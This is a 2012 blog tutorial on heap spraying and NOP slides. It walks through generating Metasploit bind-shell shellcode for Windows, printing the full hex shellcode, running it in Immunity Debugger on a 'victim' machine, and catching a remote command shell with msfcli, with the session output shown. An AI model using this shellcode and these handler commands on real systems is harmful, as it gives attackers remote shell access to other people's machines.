Tuesday, 24 July 2012

Heap hacking

HEAP SPRAYING USING NOP'S & IMMUNITY DEBUGGER

HI GUYS SEEKER HERE TODAY AFTER FEW DAYS OF STUDY AND RESEARCH I CAME UP WITH THIS NEW TRICK OF HACKING..


HEAP HACKING USING IMMUNITY DEBUGGER

What is this attack all about??

In this attack we will use IMMUNITY DEBUGGER to decipher NOP shellcode.So people who are new to hacking world might don't know what this NOP and IMMUNITY DEBUGGER are,so i will give a brief about both of them...

What is NOP?

No-operation instruction (NOP) and NOP slide.A NOP is an assembly instructionthat says, “Do nothing and move to the next instruction.” A NOP slide comprises multiple NOPs adjacent to each other in memory, basically taking up space. If a program’s execution flow encounters a series of NOP instructions, it will linearly “slide” down to the end of them to the next instruction. A NOP, in the Intel x86 architecture, has an opcode of 90, commonly seen in exploit code as \x90.

What is the use of NOP in heap spraying technique?

The heap spraying technique involves filling the heap with a known repeating pattern of NOP slides and your shellcode until you fill the entire memory space with this known value.You’ll recall that memory in the heap is dynamically allocated at program runtime. This is usually done via JavaScript,which causes the browser’s allocated memory to grow significantly. The attacker fills large blocks of memory with NOP slides and shellcode directly after them.When program execution flow is altered and randomly jumps somewhere into memory, there is a good chance of hitting a NOP slide and eventually hitting the shellcode and once the victim hits the shell code he/she is exploited and we get his command shell..

How NOP Slide means in the shell code??

In the above snapshot you can see the hexadecimal representation of \x90, the Intel x86 architecture opcode. A 90 in Intel x86 assembly is a NOP. Here you see a series of \x90s that create our NOP-slide effect. The rest of the code is the payload, such as a reverse shell or a Meterpreter shell.

What is IMMUNITY DEBUGGER?

Here to understand NOP Slide we will use IMMUNITY DEBUGGER but before doing that you should know what immunity debugger is.On your Windows XP target, download and install Immunity Debugger from http://www.immunityinc.com/.
Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. A debugger with functionality designed specifically for the security industry Cuts exploit development time by 50% Simple, understandable interfaces Robust and powerful scripting language for automating intelligent debugging Lightweight and fast debugging to prevent corruption during complex analysis Connectivity to fuzzers and exploit development tools.

LETS START THE HACKING!!!!

1 seeker@bt#msfpayload windows/shell/bind_tcp LPORT=443 E 
////use the msfpayload command to generate sample shellcode for a simple TCP bind shell, listening on port 443 ..when this command is executed it generates two shellcodes stage 1 and 2
here we are concerned with just stage1 shell code because metasploit will help us sending stage 2 code when we connect to it ////
2  Copy and paste the shellcode from stage 1 into a text editor .You’ll need to do some editing before proceeding. Now that you have your basic shellcode, add as many NOPs as you want to the beginning of it (such as \x90\x90\x90\x90\x90). Then remove all \x occurrences so it looks similar to the below snapshot.
 
909090909090909090909090909090909090909090909090909090909090909090909090909090909090909090f
ce8890000006089e531d2648b52308b520c8b52148b72280fb74a2631ff31c0ac3c617c022c20c1cf0d01c7e2f0
52578b52108b423c01d08b407885c0744a01d0508b48188b582001d3e33c498b348b01d631ff31c0acc1cf0d01c
738e075f4037df83b7d2475e2588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe058
5f5a8b12eb865d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504
050405068ea0fdfe0ffd59731db5368020001bb89e66a10565768c2db3767ffd5535768b7e938ffffd553535768
74ec3be1ffd5579768756e4d61ffd56a006a0456576802d9c85fffd58b366a406800100000566a006858a453e5f
fd593536a005653576802d9c85fffd501c329c685f675ecc3
3 Now in your victim machine install immunity debugger and open any executable here we are exploiting browser so we will user iexplore.exe from :-
FILE -> OPEN -> and the path where your iexplore.exe is
You should see a number of assembly instructions in the main window .Left-click the first       instruction on the screen, and hold down SHIFT while left-clicking to highlight some instructions below it.
5 Copy the shellcode from your text file generated from msfpayload, and right-click in the Immunity Debugger window and choose Binary->Binary paste. This will paste the assembly instructions from the our text file into the Immunity Debugger window .
 

When we first exported our shellcode in a bind_tcp format, the last instruction through stage 1 ended with ecc3. Locate the last set of memory instructions we added ending in ecc3. Right after the ecc3, press F2 to create a breakpoint and at the starting of our shell code press F2 to create breakpoint.

Open up a command prompt and type netstat -an. Nothing should be listening on 443, and this is a good sign that your payload hasn’t executed yet.

8 seeker@bt3# msfcli multi/handler PAYLOAD=windows/shell/bind_tcp RHOST=192.168.57.82 LPORT=443 E


///WE USE THIS COMMAND TO CREATE THE LISTENER ON PORT 443 WHICH WILL CONNECT THE STAGE 2 WITH THE STAGE 1 LISTENER///



9 NOW PRESS F9 IN THE IMMUNITY HANDLER AND BINGOOOO IT RUNS THE SHELL CODE AND WE GET THE COMMAND SHELL OF THE VICTIM..


msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started bind handler
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.57.73:60463 -> 192.168.57.82:443)



/////EDUCATIONAL PURPOSE ONLY////